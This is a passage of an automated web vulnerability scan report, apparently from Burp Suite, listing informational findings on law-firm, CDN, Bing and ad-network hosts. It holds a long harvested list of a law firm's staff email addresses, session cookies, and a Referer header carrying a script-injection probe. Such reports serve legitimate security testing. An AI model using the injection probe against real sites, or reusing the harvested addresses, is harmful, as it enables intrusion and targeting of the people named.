Cookie: ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmb=159286716.4.10.1305216148; __utmc=159286716; __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 12 May 2011 16:12:44 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 19992


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Wiggin and Da
...[SNIP]...
<a href="mailto:alumni@wiggin.com">alumni@wiggin.com</a>
...[SNIP]...
27.75. http://www.wiggin.com/bios.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /bios.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /bios.aspx HTTP/1.1
Host: www.wiggin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmc=159286716; __utmb=159286716.5.10.1305216148; ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 17:04:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 121224


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Wiggin and Da
...[SNIP]...
<a href="mailto:jabrams@wiggin.com">jabrams@wiggin.com</a>
...[SNIP]...
<a href="mailto:magsten@wiggin.com">magsten@wiggin.com</a>
...[SNIP]...
<a href="mailto:eamarante@wiggin.com">eamarante@wiggin.com</a>
...[SNIP]...
<a href="mailto:janderson@wiggin.com">janderson@wiggin.com</a>
...[SNIP]...
<a href="mailto:bappleby@wiggin.com">bappleby@wiggin.com</a>
...[SNIP]...
<a href="mailto:rarnedt@wiggin.com">rarnedt@wiggin.com</a>
...[SNIP]...
<a href="mailto:jbabbin@wiggin.com">jbabbin@wiggin.com</a>
...[SNIP]...
<a href="mailto:ebailey@wiggin.com">ebailey@wiggin.com</a>
...[SNIP]...
<a href="mailto:tbannon@wiggin.com">tbannon@wiggin.com</a>
...[SNIP]...
<a href="mailto:jbardavid@wiggin.com">jbardavid@wiggin.com</a>
...[SNIP]...
<a href="mailto:abayer@wiggin.com">abayer@wiggin.com</a>
...[SNIP]...
<a href="mailto:ebeard@wiggin.com">ebeard@wiggin.com</a>
...[SNIP]...
<a href="mailto:rbenjamin@wiggin.com">rbenjamin@wiggin.com</a>
...[SNIP]...
<a href="mailto:bbernblum@wiggin.com">bbernblum@wiggin.com</a>
...[SNIP]...
<a href="mailto:jbicks@wiggin.com">jbicks@wiggin.com</a>
...[SNIP]...
<a href="mailto:ebing@wiggin.com">ebing@wiggin.com</a>
...[SNIP]...
<a href="mailto:mbrown@wiggin.com">mbrown@wiggin.com</a>
...[SNIP]...
<a href="mailto:sbryson@wiggin.com">sbryson@wiggin.com</a>
...[SNIP]...
<a href="mailto:kbudge@wiggin.com">kbudge@wiggin.com</a>
...[SNIP]...
<a href="mailto:mburns@wiggin.com">mburns@wiggin.com</a>
...[SNIP]...
<a href="mailto:rburstein@wiggin.com">rburstein@wiggin.com</a>
...[SNIP]...
<a href="mailto:dcarlson@wiggin.com">dcarlson@wiggin.com</a>
...[SNIP]...
<a href="mailto:jchou@wiggin.com">jchou@wiggin.com</a>
...[SNIP]...
<a href="mailto:lchubb@wiggin.com">lchubb@wiggin.com</a>
...[SNIP]...
<a href="mailto:tclauss@wiggin.com">tclauss@wiggin.com</a>
...[SNIP]...
<a href="mailto:cclay@wiggin.com">cclay@wiggin.com</a>
...[SNIP]...
<a href="mailto:mclear@wiggin.com">mclear@wiggin.com</a>
...[SNIP]...
<a href="mailto:kclute@wiggin.com">kclute@wiggin.com</a>
...[SNIP]...
<a href="mailto:scorrigan@wiggin.com">scorrigan@wiggin.com</a>
...[SNIP]...
<a href="mailto:jcraven@wiggin.com">jcraven@wiggin.com</a>
...[SNIP]...
<a href="mailto:acunningham@wiggin.com">acunningham@wiggin.com</a>
...[SNIP]...
<a href="mailto:ddaniels@wiggin.com">ddaniels@wiggin.com</a>
...[SNIP]...
<a href="mailto:adean@wiggin.com">adean@wiggin.com</a>
...[SNIP]...
<a href="mailto:mdebarge@wiggin.com">mdebarge@wiggin.com</a>
...[SNIP]...
<a href="mailto:fdepina@wiggin.com">fdepina@wiggin.com</a>
...[SNIP]...
<a href="mailto:tdiemand@wiggin.com">tdiemand@wiggin.com</a>
...[SNIP]...
<a href="mailto:sdominick@wiggin.com">sdominick@wiggin.com</a>
...[SNIP]...
<a href="mailto:jdoroghazi@wiggin.com">jdoroghazi@wiggin.com</a>
...[SNIP]...
<a href="mailto:fduffin@wiggin.com">fduffin@wiggin.com</a>
...[SNIP]...
<a href="mailto:edunham@wiggin.com">edunham@wiggin.com</a>
...[SNIP]...
<a href="mailto:jerdfarb@wiggin.com">jerdfarb@wiggin.com</a>
...[SNIP]...
<a href="mailto:jfarrington@wiggin.com">jfarrington@wiggin.com</a>
...[SNIP]...
<a href="mailto:afeng@wiggin.com">afeng@wiggin.com</a>
...[SNIP]...
<a href="mailto:nfleming@wiggin.com">nfleming@wiggin.com</a>
...[SNIP]...
<a href="mailto:kflood@wiggin.com">kflood@wiggin.com</a>
...[SNIP]...
<a href="mailto:cfournaris@wiggin.com">cfournaris@wiggin.com</a>
...[SNIP]...
<a href="mailto:jfreiman@wiggin.com">jfreiman@wiggin.com</a>
...[SNIP]...
<a href="mailto:kdioses@wiggin.com">kdioses@wiggin.com</a>
...[SNIP]...
<a href="mailto:mgambardella@wiggin.com">mgambardella@wiggin.com</a>
...[SNIP]...
<a href="mailto:tgangemi@wiggin.com">tgangemi@wiggin.com</a>
...[SNIP]...
<a href="mailto:tgarabedian@wiggin.com">tgarabedian@wiggin.com</a>
...[SNIP]...
<a href="mailto:jgillis@wiggin.com">jgillis@wiggin.com</a>
...[SNIP]...
<a href="mailto:jglasser@wiggin.com">jglasser@wiggin.com</a>
...[SNIP]...
<a href="mailto:mgollaher@wiggin.com">mgollaher@wiggin.com</a>
...[SNIP]...
<a href="mailto:jgrasso@wiggin.com">jgrasso@wiggin.com</a>
...[SNIP]...
<a href="mailto:sgreathead@wiggin.com">sgreathead@wiggin.com</a>
...[SNIP]...
<a href="mailto:pgruen@wiggin.com">pgruen@wiggin.com</a>
...[SNIP]...
<a href="mailto:mgrundei@wiggin.com">mgrundei@wiggin.com</a>
...[SNIP]...
<a href="mailto:mharanzo@wiggin.com">mharanzo@wiggin.com</a>
...[SNIP]...
<a href="mailto:mheaphy@wiggin.com">mheaphy@wiggin.com</a>
...[SNIP]...
<a href="mailto:hheintz@wiggin.com">hheintz@wiggin.com</a>
...[SNIP]...
<a href="mailto:rhoff@wiggin.com">rhoff@wiggin.com</a>
...[SNIP]...
<a href="mailto:bhood@wiggin.com">bhood@wiggin.com</a>
...[SNIP]...
<a href="mailto:shoulton@wiggin.com">shoulton@wiggin.com</a>
...[SNIP]...
<a href="mailto:phughes@wiggin.com">phughes@wiggin.com</a>
...[SNIP]...
<a href="mailto:tjones@wiggin.com">tjones@wiggin.com</a>
...[SNIP]...
<a href="mailto:mkaduboski@wiggin.com">mkaduboski@wiggin.com</a>
...[SNIP]...
<a href="mailto:ekaiman@wiggin.com">ekaiman@wiggin.com</a>
...[SNIP]...
<a href="mailto:skaufman@wiggin.com">skaufman@wiggin.com</a>
...[SNIP]...
<a href="mailto:akazazian@wiggin.com">akazazian@wiggin.com</a>
...[SNIP]...
<a href="mailto:kkennedy@wiggin.com">kkennedy@wiggin.com</a>
...[SNIP]...
<a href="mailto:skennedy@wiggin.com">skennedy@wiggin.com</a>
...[SNIP]...
<a href="mailto:mkenny@wiggin.com">mkenny@wiggin.com</a>
...[SNIP]...
<a href="mailto:dkesner@wiggin.com">dkesner@wiggin.com</a>
...[SNIP]...
<a href="mailto:skilaru@wiggin.com">skilaru@wiggin.com</a>
...[SNIP]...
<a href="mailto:wkilgallen@wiggin.com">wkilgallen@wiggin.com</a>
...[SNIP]...
<a href="mailto:jkim@wiggin.com">jkim@wiggin.com</a>
...[SNIP]...
<a href="mailto:ckingsley@wiggin.com">ckingsley@wiggin.com</a>
...[SNIP]...
<a href="mailto:lkirby@wiggin.com">lkirby@wiggin.com</a>
...[SNIP]...
<a href="mailto:lkmec@wiggin.com">lkmec@wiggin.com</a>
...[SNIP]...
<a href="mailto:akweskin@wiggin.com">akweskin@wiggin.com</a>
...[SNIP]...
<a href="mailto:rlanger@wiggin.com">rlanger@wiggin.com</a>
...[SNIP]...
<a href="mailto:lleader@wiggin.com">lleader@wiggin.com</a>
...[SNIP]...
<a href="mailto:plefeber@wiggin.com">plefeber@wiggin.com</a>
...[SNIP]...
<a href="mailto:dleibell@wiggin.com">dleibell@wiggin.com</a>
...[SNIP]...
<a href="mailto:alemar@wiggin.com">alemar@wiggin.com</a>
...[SNIP]...
<a href="mailto:rlevan@wiggin.com">rlevan@wiggin.com</a>
...[SNIP]...
<a href="mailto:jloughran@wiggin.com">jloughran@wiggin.com</a>
...[SNIP]...
<a href="mailto:slove@wiggin.com">slove@wiggin.com</a>
...[SNIP]...
<a href="mailto:smahajan@wiggin.com">smahajan@wiggin.com</a>
...[SNIP]...
<a href="mailto:smalech@wiggin.com">smalech@wiggin.com</a>
...[SNIP]...
<a href="mailto:fmarco@wiggin.com">fmarco@wiggin.com</a>
...[SNIP]...
<a href="mailto:jmartini@wiggin.com">jmartini@wiggin.com</a>
...[SNIP]...
<a href="mailto:amatthews@wiggin.com">amatthews@wiggin.com</a>
...[SNIP]...
<a href="mailto:rmatthews@wiggin.com">rmatthews@wiggin.com</a>
...[SNIP]...
<a href="mailto:bmcdermott@wiggin.com">bmcdermott@wiggin.com</a>
...[SNIP]...
<a href="mailto:pmelick@wiggin.com">pmelick@wiggin.com</a>
...[SNIP]...
<a href="mailto:mmenapace@wiggin.com">mmenapace@wiggin.com</a>
...[SNIP]...
<a href="mailto:jmerschman@wiggin.com">jmerschman@wiggin.com</a>
...[SNIP]...
<a href="mailto:bmoore@wiggin.com">bmoore@wiggin.com</a>
...[SNIP]...
<a href="mailto:cmorgan@wiggin.com">cmorgan@wiggin.com</a>
...[SNIP]...
<a href="mailto:cmullan@wiggin.com">cmullan@wiggin.com</a>
...[SNIP]...
<a href="mailto:pnevins@wiggin.com">pnevins@wiggin.com</a>
...[SNIP]...
<a href="mailto:mnorris@wiggin.com">mnorris@wiggin.com</a>
...[SNIP]...
<a href="mailto:dormstedt@wiggin.com">dormstedt@wiggin.com</a>
...[SNIP]...
<a href="mailto:apal@wiggin.com">apal@wiggin.com</a>
...[SNIP]...
<a href="mailto:spalaia@wiggin.com">spalaia@wiggin.com</a>
...[SNIP]...
<a href="mailto:lpeikes@wiggin.com">lpeikes@wiggin.com</a>
...[SNIP]...
<a href="mailto:wperrone@wiggin.com">wperrone@wiggin.com</a>
...[SNIP]...
<a href="mailto:wprout@wiggin.com">wprout@wiggin.com</a>
...[SNIP]...
<a href="mailto:mpych@wiggin.com">mpych@wiggin.com</a>
...[SNIP]...
<a href="mailto:nrele@wiggin.com">nrele@wiggin.com</a>
...[SNIP]...
<a href="mailto:krinehart@wiggin.com">krinehart@wiggin.com</a>
...[SNIP]...
<a href="mailto:grobinson@wiggin.com">grobinson@wiggin.com</a>
...[SNIP]...
<a href="mailto:grosenblatt@wiggin.com">grosenblatt@wiggin.com</a>
...[SNIP]...
<a href="mailto:jrowe@wiggin.com">jrowe@wiggin.com</a>
...[SNIP]...
<a href="mailto:sryer@wiggin.com">sryer@wiggin.com</a>
...[SNIP]...
<a href="mailto:jsaphia@wiggin.com">jsaphia@wiggin.com</a>
...[SNIP]...
<a href="mailto:dschaffer@wiggin.com">dschaffer@wiggin.com</a>
...[SNIP]...
<a href="mailto:aschwartz@wiggin.com">aschwartz@wiggin.com</a>
...[SNIP]...
<a href="mailto:pseaman@wiggin.com">pseaman@wiggin.com</a>
...[SNIP]...
<a href="mailto:rsexton@wiggin.com">rsexton@wiggin.com</a>
...[SNIP]...
<a href="mailto:nshonka@wiggin.com">nshonka@wiggin.com</a>
...[SNIP]...
<a href="mailto:tsimonis@wiggin.com">tsimonis@wiggin.com</a>
...[SNIP]...
<a href="mailto:jsmith@wiggin.com">jsmith@wiggin.com</a>
...[SNIP]...
<a href="mailto:ksmith@wiggin.com">ksmith@wiggin.com</a>
...[SNIP]...
<a href="mailto:ssullivan@wiggin.com">ssullivan@wiggin.com</a>
...[SNIP]...
<a href="mailto:ttownsend@wiggin.com">ttownsend@wiggin.com</a>
...[SNIP]...
<a href="mailto:btrilling@wiggin.com">btrilling@wiggin.com</a>
...[SNIP]...
<a href="mailto:cventura@wiggin.com">cventura@wiggin.com</a>
...[SNIP]...
<a href="mailto:bwatson@wiggin.com">bwatson@wiggin.com</a>
...[SNIP]...
<a href="mailto:mweaver@wiggin.com">mweaver@wiggin.com</a>
...[SNIP]...
<a href="mailto:aweir@wiggin.com">aweir@wiggin.com</a>
...[SNIP]...
<a href="mailto:wwu@wiggin.com">wwu@wiggin.com</a>
...[SNIP]...
<a href="mailto:jzandy@wiggin.com">jzandy@wiggin.com</a>
...[SNIP]...
<a href="mailto:szuch@wiggin.com">szuch@wiggin.com</a>
...[SNIP]...
27.76. http://www.wiggin.com/showarea.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /showarea.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /showarea.aspx?Show=10669 HTTP/1.1
Host: www.wiggin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wiggin.com/areas.aspx
Cookie: ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmb=159286716.2.10.1305216148; __utmc=159286716; __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 12 May 2011 16:04:36 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 34422


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
<title>Wiggin and
...[SNIP]...
<a href='mailto:mheaphy@wiggin.com'><i>mheaphy@wiggin.com</i>
...[SNIP]...
<a href='mailto:nrele@wiggin.com'><i>nrele@wiggin.com</i>
...[SNIP]...
<a href="mailto:mheaphy@wiggin.com">mheaphy@wiggin.com</a>
...[SNIP]...
<a href="mailto:skilaru@wiggin.com">skilaru@wiggin.com</a>
...[SNIP]...
<a href="mailto:smahajan@wiggin.com">smahajan@wiggin.com</a>
...[SNIP]...
<a href="mailto:pmelick@wiggin.com">pmelick@wiggin.com</a>
...[SNIP]...
<a href="mailto:nrele@wiggin.com">nrele@wiggin.com</a>
...[SNIP]...
<a href="mailto:jsaphia@wiggin.com">jsaphia@wiggin.com</a>
...[SNIP]...
<a href="mailto:dschaffer@wiggin.com">dschaffer@wiggin.com</a>
...[SNIP]...
<a href="mailto:tsimonis@wiggin.com">tsimonis@wiggin.com</a>
...[SNIP]...
28. Private IP addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zL/r/FGFbc80dUKj.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

Request

GET /rsrc.php/v1/zL/r/FGFbc80dUKj.png HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html?59261%22%3E%3Cscript%3Ealert(1)%3C/script%3E223d24b026d=1

Response

HTTP/1.1 200 OK
Content-Length: 1916
Content-Type: image/png
Last-Modified: Sun, 14 Mar 2010 16:59:39 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.148.193
X-Cnection: close
Cache-Control: public, max-age=26453121
Expires: Tue, 13 Mar 2012 23:59:33 GMT
Date: Thu, 12 May 2011 19:54:12 GMT
Connection: close

.PNG
.
...IHDR...'.........b_Ci....PLTE...Oj.r..y..z...5nEa.z.....{..|........ay.......F_...................{..m........D^....@Z.B[....E^.C].......@Z.p..Le....p...........C].B\.............A[.......
...[SNIP]...
29. Social security numbers disclosed  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.nldhlaw.com
Path:   /Includes/Templates/Active/site.css

Issue detail

The following social security number was disclosed in the response:

Issue background

Responses containing social security numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid SSNs and whether their disclosure within the application is appropriate.

Request

GET /Includes/Templates/Active/site.css HTTP/1.1
Host: www.nldhlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nldhlaw.com/
Cookie: ASPSESSIONIDASCAQAQD=FPPKOIPBNEPEKIPAKHLPOKPB; BIGipServerFIRMSND07-80=272948490.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 20308
Content-Type: text/css
Last-Modified: Thu, 05 May 2011 20:14:30 GMT
Accept-Ranges: bytes
ETag: "bee7ba61bcc1:144f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Thu, 12 May 2011 16:09:08 GMT

/* FS CONTROL - BASE STYLESHEET - UPDATED 010-25-2010 */

html { font-size: .625em; }
#ie html { font-size: 1em; }
body { margin: 0; padding: 0; background: #FFFFFF; color: #000000; }
body, input, textarea, option, select { font-family:Tahoma, Genev
...[SNIP]...
30. Credit card numbers disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following credit card numbers were disclosed in the response:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /search?q=gigablast.com&src=ie9tr HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: www.bing.com
Proxy-Connection: Keep-Alive
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHD=MS=1766474&SM=1&D=1593447&AF=NOFORM; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; _UR=OMW=0; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c91dbe765356b43c2af9db971344153a4

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Date: Thu, 12 May 2011 15:13:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _SS=SID=357505634DE040F7AAB78C84F4F41453; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Sat, 11-May-2013 15:13:50 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c0a2bc88e712d46c3bff774df04608da4; expires=Sat, 11-May-2013 15:13:50 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1767793&SM=1&D=1593447&AF=NOFORM; expires=Sat, 11-May-2013 15:13:50 GMT; domain=.bing.com; path=/
Content-Length: 39226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<a class="sa_cpt" u="4|1040|5030175692490728|c7947328,ca8b78d5">
...[SNIP]...
<a class="sa_cpt" u="8|1080|4990245383111619|b94c1b6d,e8b2593">
...[SNIP]...
<a class="sa_cpt" u="9|1090|4615002690552109|e103de31,b4173125">
...[SNIP]...
31. Robots.txt file  previous  next
There are 77 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

31.1. http://158-vdp-616.mktoresp.com/webevents/visitWebPage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://158-vdp-616.mktoresp.com
Path:   /webevents/visitWebPage

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 158-vdp-616.mktoresp.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 19:28:02 GMT
Server: Apache
Last-Modified: Thu, 28 Apr 2011 23:21:22 GMT
ETag: "1b18835-18-4a202d0b50080"
Accept-Ranges: bytes
Content-Length: 24
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
31.2. http://ad.doubleclick.net/ad/N3282.nytimes.comSD6440/B3948326.5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Thu, 12 May 2011 19:53:40 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /
31.3. http://ads.keypromedia.com/www/delivery/ajs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.keypromedia.com
Path:   /www/delivery/ajs.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.keypromedia.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:35:40 GMT
Server: Apache/2.2
Last-Modified: Tue, 14 Sep 2010 21:25:55 GMT
ETag: "750a51-17a-4903edbb09ec0"
Accept-Ranges: bytes
Content-Length: 378
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...
31.4. http://api.recaptcha.net/challenge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.recaptcha.net
Path:   /challenge

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.recaptcha.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 12 May 2011 16:42:12 GMT
Expires: Thu, 12 May 2011 16:42:12 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /
31.5. http://attorney.findlaw.com/b/ss/findlaw-12282,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s35924329407941  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://attorney.findlaw.com
Path:   /b/ss/findlaw-12282,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s35924329407941

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: attorney.findlaw.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:09:28 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "3119b-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www379
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
31.6. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Fri, 13 May 2011 18:35:49 GMT
Date: Thu, 12 May 2011 18:35:49 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /
31.7. http://c.statcounter.com/t.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /t.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.statcounter.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:09:22 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Sep 2010 14:41:23 GMT
ETag: "8805c-1a-49166f495eac0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:
31.8. http://capgroup.112.2o7.net/b/ss/capgroupprod/1/H.15.1/s41646418426182  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgroup.112.2o7.net
Path:   /b/ss/capgroupprod/1/H.15.1/s41646418426182

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: capgroup.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 19:44:41 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "36a0e5-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www419
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
31.9. http://cspix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cspix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"36-1274467434000"
Last-Modified: Fri, 21 May 2010 18:43:54 GMT
Content-Type: text/plain
Content-Length: 36
Date: Thu, 12 May 2011 16:12:00 GMT
Connection: close

# go away
User-agent: *
Disallow: /
31.10. http://d1.openx.org/spcjs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /spcjs.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d1.openx.org

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:44:43 GMT
